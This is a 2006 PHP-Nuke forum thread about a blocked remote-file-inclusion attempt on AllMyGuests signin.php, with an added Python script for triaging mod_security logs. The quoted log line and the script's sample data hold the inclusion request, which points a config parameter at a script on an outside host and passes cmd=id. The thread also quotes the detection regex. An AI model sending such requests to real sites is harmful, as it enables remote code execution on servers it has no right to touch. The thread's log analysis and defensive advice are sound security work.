Ravens PHP Scripts: Forums
Gremmie (Former Moderator in Good Standing)
Joined: Apr 06, 2006 | Posts: 2415 | Location: Iowa, USA
Posted: Sat Jun 10, 2006 5:11 pm

Code:
[Sat Jun 10 16:41:05 2006] [error] [client x.x.x.x] mod_security: Access denied with code 403. Pattern match "=(http|www|ftp)\\\\:/(.+)\\\\.(c|dat|gif|jpg|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\\\x20?\\\\?" at REQUEST_URI [severity "EMERGENCY"] [hostname "www.myhost.com"] [uri "/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.panzergrenadiers.com/ss/tool25.dat?&list=1&cmd=id"]

I changed my host name to myhost and x'd out the IP address, but otherwise this is exactly what I happened to notice in my log today. What does this mean? It looks like my host's server blocked it, not my Nuke or Sentinel. Correct?

If you look at the link

It appears to be some kind of defacing script.

What's going on here and who should I contact? Thanks.
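As an added example (not code from the thread or from any of the posters), the script below reads mod_security "Access denied" lines in the error_log layout quoted above and reports, for each one, whether the request was blocked (code 403), which query parameter carried a URL pointing at a server other than your own, and whether a cmd= parameter rode along. The sample lines are constructed for the example: the client addresses, the attacker host name and the default own_host value are placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in the ModSecurity 1.x error_log layout quoted in the
# post above. Client addresses and the attacker host are placeholders.
SAMPLE_LOG = [
    r'[Sat Jun 10 16:41:05 2006] [error] [client 192.0.2.10] mod_security: Access denied with code 403. Pattern match "=(http|www|ftp)\\\\:/(.+)\\\\.(c|dat|gif|jpg|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\\\x20?\\\\?" at REQUEST_URI [severity "EMERGENCY"] [hostname "www.myhost.com"] [uri "/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://attacker.example/ss/tool25.dat?&list=1&cmd=id"]',
    r'[Sat Jun 10 17:02:44 2006] [error] [client 192.0.2.11] mod_security: Access denied with code 403. Pattern match "=(http|www|ftp)\\\\:/" at REQUEST_URI [severity "EMERGENCY"] [hostname "www.myhost.com"] [uri "/modules.php?name=News&url=http://www.myhost.com/index.php"]',
    "[Sat Jun 10 17:05:00 2006] [notice] Apache configured -- resuming normal operations",
]

# One regex for the "Access denied" line; the [hostname ...] field is made
# optional so lines without it still parse.
MODSEC_RE = re.compile(
    r'^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<client>[^\]]+)\] '
    r'mod_security: Access denied with code (?P<code>\d+)\. '
    r'(?P<reason>.*?) \[severity "(?P<severity>[^"]+)"\]'
    r'(?: \[hostname "(?P<host>[^"]+)"\])? \[uri "(?P<uri>[^"]+)"\]$'
)

REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def parse_modsec_line(line):
    """Return the fields of a ModSecurity 'Access denied' line, or None."""
    m = MODSEC_RE.match(line.strip())
    return m.groupdict() if m else None


def query_params(uri):
    """Query-string parameters of a request URI as a list of (name, value)."""
    return parse_qsl(urlsplit(uri).query, keep_blank_values=True)


def remote_parameters(uri, own_host):
    """(name, value) pairs whose value is a URL pointing at a host other than ours.

    A request that tries to make a PHP include() fetch a script from another
    server carries such a value, as the signin.php request in the post does.
    """
    found = []
    for name, value in query_params(uri):
        if value.lower().startswith(REMOTE_SCHEMES):
            target = (urlsplit(value).hostname or "").lower()
            if target != own_host.lower():
                found.append((name, value))
    return found


def assess(line, own_host="www.myhost.com"):
    """Classify one error_log line; own_host (placeholder) is used when the line has no hostname."""
    rec = parse_modsec_line(line)
    if rec is None:
        return None
    host = rec["host"] or own_host
    params = dict(query_params(rec["uri"]))
    remote = remote_parameters(rec["uri"], host)
    return {
        "timestamp": rec["ts"],
        "client": rec["client"],
        "blocked": rec["code"] == "403",
        "path": urlsplit(rec["uri"]).path,
        "remote_includes": remote,
        "command_param": params.get("cmd"),
        "verdict": "remote-include attempt" if remote else "other blocked request",
    }


def triage(lines, own_host="www.myhost.com"):
    """Assess every line, dropping lines that are not ModSecurity denials."""
    results = [assess(line, own_host) for line in lines]
    return [r for r in results if r is not None]


if __name__ == "__main__":
    for r in triage(SAMPLE_LOG):
        status = "blocked" if r["blocked"] else "NOT blocked"
        print(f'{r["timestamp"]} {r["client"]} {r["path"]}: {r["verdict"]} ({status})')
        for name, url in r["remote_includes"]:
            print(f"  parameter {name} points off-host to {url}")
        if r["command_param"]:
            print(f'  extra parameter cmd={r["command_param"]}')
```

Run it over your real error_log (one line per list entry, or read the file) with own_host set to your site's name; a "remote-include attempt" line that is not marked blocked is the one worth investigating, since it means the request reached the script rather than being stopped at the web server.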
hitwalker (Sells PC To Pay For Divorce)
Posts: 5661
Posted: Sat Jun 10, 2006 5:43 pm

Welcome to the club, yes these are simple tools they use on hundreds of websites every day.
The attacks are usually targeted towards forums, AllMyGuests, Coppermine, Gallery2 etc... and the list continues.
Most of the time it doesn't work but they are doing this remotely and hope someday they have a victim...
and there's nothing much you can do, but make sure you are secured and don't use any mods that aren't secure..
Susann (Moderator)
Joined: Dec 19, 2004 | Posts: 3191 | Location: Germany: Moderator German NukeSentinel Support
Posted: Sat Jun 10, 2006 5:51 pm

That's club member number 100.001 :) Nice club.

403 in your log files means forbidden, so there is nothing to do. Do a search here in the forum for AllMyGuests signin.php or cmd.
fkelly (Former Moderator in Good Standing)
Joined: Aug 30, 2005 | Posts: 3312 | Location: near Albany NY
Posted: Sat Jun 10, 2006 9:23 pm

This site and defacing tool was in my log tonight when I checked it too. It was from a Turkish IP address and I had taken advantage of Nuke Sentinel and the import tool and IP2country tables to ban the whole country. You might want to look at that option unless you need Turkish users. There are a few countries where a lot of hacks come from. In the hack script that I looked at he includes another hack script from Brazil.

Just try to keep current with Sentinel and keep checking your logs and make sure no one has a back door into your site via the administrative interface provided by your host.
kguske (Site Admin)
Joined: Jun 04, 2004 | Posts: 6383
Posted: Sun Jun 11, 2006 10:14 am

While it's true that most of the script kiddies who use tools like this probably couldn't figure out how to spoof their IP address, it isn't that hard to do...

Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours